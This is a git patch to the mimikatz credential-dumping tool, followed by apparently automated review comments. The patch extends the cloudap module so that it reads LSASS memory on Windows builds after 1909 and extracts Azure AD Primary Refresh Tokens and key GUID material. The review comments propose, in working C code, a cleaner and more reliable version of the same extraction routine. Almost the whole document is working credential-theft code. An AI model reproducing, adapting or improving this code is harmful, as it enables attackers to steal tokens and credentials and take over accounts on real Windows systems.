From da34c29e45c7fb9f993e953c637c434c22245080 Mon Sep 17 00:00:00 2001
From: dbienstock
Date: Thu, 7 Jul 2022 17:27:48 -0400
Subject: [PATCH] cloudap support for versions > 1909. sort of hacky

---
 .../packages/kuhl_m_sekurlsa_cloudap.c | 92 ++++++++++++++-----
 .../packages/kuhl_m_sekurlsa_cloudap.h | 16 +++-
 2 files changed, 83 insertions(+), 25 deletions(-)

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
index dd5729f..435f36b 100644
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
@@ -29,45 +29,89 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[]) void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) { - KIWI_CLOUDAP_LOGON_LIST_ENTRY logon; + KIWI_CLOUDAP_CACHE_LIST_ENTRY cache; KIWI_CLOUDAP_CACHE_UNK unk; - KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem}; + KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem}; KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0}; if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)) { aLsassMemory.address = CloudApGlobalLogonSessionList; - if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId)) + if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909) { - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY))) + KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon; + KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; + if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId)) { - if(logon.cacheEntry) + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2))) { - aLocalMemory.address = &cache; - aLsassMemory.address = logon.cacheEntry; - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY))) + if(logon.cacheEntry) { - kprintf(L"\n\t Cachedir : %s", cache.toname); - if(cache.cbPRT && cache.PRT) + aLocalMemory.address = &cache; + aLsassMemory.address = logon.cacheEntry; + 
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY))) { - creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT; - creds.UserName.Buffer = (PWSTR) cache.PRT; - } - - if(cache.toDetermine) - { - aLocalMemory.address = &unk; - aLsassMemory.address = cache.toDetermine; - if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK))) + kprintf(L"\n\t Cachedir : %s", cache.toname); + if(cache.cbPRT && cache.PRT) { - kprintf(L"\n\t Key GUID : "); - kull_m_string_displayGUID(&unk.guid); - creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize; - creds.Password.Buffer = (PWSTR) unk.unk; + creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT; + creds.UserName.Buffer = (PWSTR) cache.PRT; } + + if(cache.toDetermine) + { + aLocalMemory.address = &unk; + aLsassMemory.address = cache.toDetermine; + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK))) + { + kprintf(L"\n\t Key GUID : "); + kull_m_string_displayGUID(&unk.guid); + creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize; + creds.Password.Buffer = (PWSTR) unk.unk; + } + } + kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT); + } + } + } + } + } + else + { + KIWI_CLOUDAP_LOGON_LIST_ENTRY logon; + KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; + if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId)) + { + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY))) + { + if(logon.cacheEntry) + { + aLocalMemory.address = &cache; + aLsassMemory.address = logon.cacheEntry; + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY))) + { + kprintf(L"\n\t Cachedir : %s", cache.toname); + 
if(cache.cbPRT && cache.PRT) + { + creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT; + creds.UserName.Buffer = (PWSTR) cache.PRT; + } + + if(cache.toDetermine) + { + aLocalMemory.address = &unk; + aLsassMemory.address = cache.toDetermine; + if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK))) + { + kprintf(L"\n\t Key GUID : "); + kull_m_string_displayGUID(&unk.guid); + creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize; + creds.Password.Buffer = (PWSTR) unk.unk; + } + } + kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT); } - kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT); } } } diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h index 7b20f46..89f3fdd 100644 --- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h +++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h @@ -90,4 +90,18 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 { DWORD unk6; PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry; // ... -} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11; \ No newline at end of file +} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11; + +typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 { + struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink; + struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink; + DWORD unk0; + DWORD unk1; + DWORD unk2; + LUID LocallyUniqueIdentifier; + DWORD unk3; + DWORD64 unk4; + DWORD64 unk5; + PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry; + // ... +} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2; \ No newline at end of file
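Review bot: The two branches of the new `BuildNumber > KULL_M_WIN_BUILD_10_1909` test in kuhl_m_sekurlsa_enum_logon_callback_cloudap duplicate the entire cache / PRT / key-GUID walk (about forty lines each) and differ only in which logon-entry type feeds `sizeof`, `FIELD_OFFSET(..., LocallyUniqueIdentifier)` and the `cacheEntry` read, so every later fix to the PRT handling has to be applied twice. The gate is also one-sided: every build above 1909, Windows 11 included, takes the `_21H2` layout, while this header already declares `KIWI_CLOUDAP_LOGON_LIST_ENTRY_11` (visible in the second hunk's context) and nothing in the new code uses it; if that layout really differs, `cacheEntry` is read from the wrong offset on those builds and the branch should be bounded on both sides or the `_11` struct removed. I would resolve size and the two offsets once per build and keep a single read path, as sketched below, with the cache copy, PRT / key-GUID extraction and genericCredsOutput call kept exactly as the hunk has them; the callback's closing braces lie beyond the hunk. The `if (` with a space is also the only such spelling in a file that writes `if(` everywhere else.
```c
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
	union {
		KIWI_CLOUDAP_LOGON_LIST_ENTRY legacy;
		KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 v21h2;
	} logon;
	KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
	KIWI_CLOUDAP_CACHE_UNK unk;
	KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
	KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
	SIZE_T cbLogon;
	LONG luidOffset, cacheOffset;
	PKIWI_CLOUDAP_CACHE_LIST_ENTRY pCacheEntry;

	/* Resolve the logon-entry layout once; the walk below is layout-agnostic. */
	if(pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909)
	{
		cbLogon = sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2);
		luidOffset = FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier);
		cacheOffset = FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, cacheEntry);
	}
	else
	{
		cbLogon = sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY);
		luidOffset = FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier);
		cacheOffset = FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, cacheEntry);
	}

	/* … unchanged: Module.isInit || kuhl_m_sekurlsa_utils_search_generic(...) test … */
	{
		aLsassMemory.address = CloudApGlobalLogonSessionList;
		if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, luidOffset, pData->LogonId))
		{
			if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, cbLogon))
			{
				/* cacheEntry sits at a layout-dependent offset; read it through the resolved offset */
				pCacheEntry = *(PKIWI_CLOUDAP_CACHE_LIST_ENTRY *) ((PBYTE) &logon + cacheOffset);
				if(pCacheEntry)
				{
					aLocalMemory.address = &cache;
					aLsassMemory.address = pCacheEntry;
					/* … unchanged: cache copy, Cachedir print, PRT / key-GUID extraction, genericCredsOutput … */
```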
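Review bot: In the new `KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2`, `Flink` and `Blink` are typed `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY*`, i.e. pointers to the older layout, which reads as a copy-paste from that struct; the list walker only consumes the LUID offset so it compiles and works, but the links should name the entries they actually join, `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2* Flink;` and `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2* Blink;`. The struct also records nothing about where its layout came from, while the .c side selects it for every build above `KULL_M_WIN_BUILD_10_1909` and this same header still carries a separate `KIWI_CLOUDAP_LOGON_LIST_ENTRY_11`; a comment above the typedef along the lines of `// logon entry layout selected when BuildNumber > KULL_M_WIN_BUILD_10_1909; recovered from build <fill in>; unk3..unk5 not identified` would let the next person re-check the offsets instead of rediscovering them. The hunk also leaves the file without a trailing newline, as the `\ No newline at end of file` marker shows; ending the file with a newline avoids the warning on every later diff.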